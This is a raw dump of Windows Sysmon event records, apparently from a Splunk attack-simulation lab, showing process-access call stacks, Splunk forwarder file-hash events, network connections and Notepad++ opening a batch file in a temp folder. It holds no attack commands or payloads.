07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F2ED-60EB-EF7C-00000000CF01}8308C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.181{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F2ED-60EB-EF7C-00000000CF01}8308C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001046069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.104{466BC892-F2ED-60EB-EF7C-00000000CF01}8308C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\test\sil.bat"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001046087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:46.826{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A712377678413825FCEDF78DE23755BD,SHA256=9FA53FFF7D8655EC511EDC3DA67737D04F568BAFDF3EA5BABA8F522BF25CEC6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:44.258{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57162-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:46.688{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8424C5AAA6D187615A9178FDB0D9949C,SHA256=FEB4EED2E5C2BA2362600A1F09983D01BA2FF8E8DA33FD40B6EF8B7719CDAD6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:46.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21C243F000BF643C33E1459C657CBF1B,SHA256=AAD7E5DA174707331F974733AE42127FF78084DEC6B668978CE9A4C40A1A966A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:46.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B698DD59E61EE1355A552D965121923,SHA256=200230CE5CB5CA47EFD61EFCE2B4A688FE1CA334B6D73CB13374A388BBB4D808,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:37.766{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50916-false10.0.1.12-8000- 23542300x80000000000000001046088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:47.827{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE0D65673CCD1A917E8F4AC4ADE0CFF,SHA256=BE35A391DE3D43D3A3FBCAC6C5F329A389F1EF68579F5EC09525289AE67CAE2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:47.703{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD4C99441BD81C57DF88667C3F85FEA,SHA256=FA21B87B2197C225B686922617EBC0878059B0F00F1DAC841CCD9C7C2C2AEBD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:48.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A40D68352189240F2C1474C98907A46F,SHA256=D9F1237EAE9850398CA71C6CA2AA9891B0B8BC1199445CC6501F8CF5ECF8FB90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:48.735{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F27DC4B96876D6E83CB5A5F5BCAD8FBB,SHA256=17C69028908905CF20123D7109291815D99F641A41F6A9925895545AD3CCE3F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:49.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D1EE105141B04C880B1EB63436707CA,SHA256=8516F14431D45D02A2412FACF16E41BD6ABEEC13AB03E172ECDF8AD5175018D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:49.828{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203BB9818FEC45559421A34AABAA88E3,SHA256=A4F051449247BA1638ACE5EE8FB907DF044E56C1EF4CCE00FA15C726CB417E09,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:41.323{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-53160-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:49.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21C243F000BF643C33E1459C657CBF1B,SHA256=AAD7E5DA174707331F974733AE42127FF78084DEC6B668978CE9A4C40A1A966A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD9EB49C75079C164378F6BDAF1DD85B,SHA256=ADB83EBAA3A83CDD18BB363A16A5EFC398F0F358C877DD96D976DF8421E3763E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:49.383{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57163-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:50.828{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C737178379CA74F22499C5A9C1C875B,SHA256=EB93B0BE6B3F965957BE92265F850FC4F9E3803DA6860F052EB8168053E86244,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.862{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.856{466BC892-F2F2-60EB-F17C-00000000CF01}8836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001046101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.409{466BC892-F2F2-60EB-F07C-00000000CF01}90007968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.193{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.193{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.193{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.178{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.178{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.178{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 